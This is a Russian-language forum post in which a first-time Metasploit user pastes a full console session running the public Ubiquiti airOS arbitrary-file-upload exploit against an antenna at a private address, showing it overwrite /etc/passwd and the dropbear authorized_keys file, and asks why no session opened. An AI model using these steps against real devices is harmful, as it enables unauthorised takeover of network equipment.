• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

Metasploit, exploit completed, but no session was created...

area51

New member
29.07.2021
1
0
BIT
0
Друзья, всем привет!
Подскажите в чем проблема, пытаюсь выполнить эксплойт на антенне ubiquiti AirOS, версия подходящая.
Антенна с системы на которой запускаю (kali linux) доступна, но эксплойт не работает.
Вот мои действия по шагам (найти эксплойт, задать опции и запустить:
Bash:
msf6 > search ubiquiti                                                                                                                                               
                                                                                                                                                                    
Matching Modules                                                                                                                                                     
================                                                                                                                                                     
                                                                                                                                                                    
   #  Name                                           Disclosure Date  Rank       Check  Description                                                                 
   -  ----                                           ---------------  ----       -----  -----------                                                                 
   0  post/multi/gather/ubiquiti_unifi_backup                         normal     No     Multi Gather Ubiquiti UniFi Controller Backup                               
   1  auxiliary/admin/networking/ubiquiti_config                      normal     No     Ubiquiti Configuration Importer                                             
   2  auxiliary/scanner/ubiquiti/ubiquiti_discover                    normal     No     Ubiquiti Discovery Scanner                                                   
   3  exploit/linux/http/ubiquiti_airos_file_upload  2016-02-13       excellent  No     Ubiquiti airOS Arbitrary File Upload                                         
                                                                                                                                                                    
                                                                                                                                                                    
Interact with a module by name or index. For example info 3, use 3 or use exploit/linux/http/ubiquiti_airos_file_upload                                             
                                                                                                                                                                    
msf6 > use 3                                                                                                                                                         
[*] No payload configured, defaulting to cmd/unix/interact                                                                                                           
msf6 exploit(linux/http/ubiquiti_airos_file_upload) > show options                                                                                                   
                                                                                                                                                                    
Module options (exploit/linux/http/ubiquiti_airos_file_upload):                                                                                                     
                                                                                                                                                                    
   Name      Current Setting  Required  Description                                                                                                                 
   ----      ---------------  --------  -----------                                                                                                                 
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]                                                                 
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'                                           
   RPORT     443              yes       The target port (TCP)                                                                                                       
   SSH_PORT  22               yes       SSH port                                                                                                                     
   SSL       true             no        Negotiate SSL/TLS for outgoing connections                                                                                   
   VHOST                      no        HTTP server virtual host                                                                                                     
                                                                                                                                                                    
                                                                                                                                                                    
Payload options (cmd/unix/interact):                                                                                                                                 
                                                                                                                                                                    
   Name  Current Setting  Required  Description                                                                                                                     
   ----  ---------------  --------  -----------                                                                                                                     
                                                                                                                                                                    
                                                                                                                                                                    
Exploit target:                                                                                                                                                     
                                                                                                                                                                    
   Id  Name                                                                                                                                                         
   --  ----                                                                                                                                                         
   0   Ubiquiti airOS < 5.6.2                                                                                                                                       
                                                                                                                                                                    
                                                                                                                                                                    
msf6 exploit(linux/http/ubiquiti_airos_file_upload) > set rhosts 192.168.1.18                                                                                       
rhosts => 192.168.1.18                                                                                                                                               
msf6 exploit(linux/http/ubiquiti_airos_file_upload) > show options                                                                                       
                                                                                                                                                                    
Module options (exploit/linux/http/ubiquiti_airos_file_upload):                                                                                                     
                                                                                                                                                                    
   Name      Current Setting  Required  Description                                                                                                                 
   ----      ---------------  --------  -----------                                                                                                                 
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]                                                                 
   RHOSTS    192.168.1.18     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'                                           
   RPORT     443              yes       The target port (TCP)                                                                                                       
   SSH_PORT  22               yes       SSH port
   SSL       true             no        Negotiate SSL/TLS for outgoing connections
   VHOST                      no        HTTP server virtual host


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Ubiquiti airOS < 5.6.2


msf6 exploit(linux/http/ubiquiti_airos_file_upload) > exploit

[*] Uploading /etc/passwd
[*] Uploading /etc/dropbear/authorized_keys
[*] Logging in as ldyzizxm
[*] Exploit completed, but no session was created.

Пользуюсь metasploit первый раз, может быть что-то не так делаю?
Версия AirOS на антенне 5.5.6.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!